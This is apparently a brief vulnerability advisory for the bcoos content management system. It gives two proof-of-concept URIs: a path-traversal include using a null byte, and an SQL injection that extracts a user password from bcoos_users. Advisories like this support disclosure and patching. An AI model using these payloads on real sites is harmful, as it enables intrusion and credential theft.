|
bcoos Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/bcoos/modules/news/?xoopsOption[pagetype]=../../images/avatar/users/[uid].gif%00 http://www.example.com/bcoos/modules/banners/click.php?bid=-1 UNION SELECT pass FROM bcoos_users LIMIT 1 |
|
|
Privacy Statement |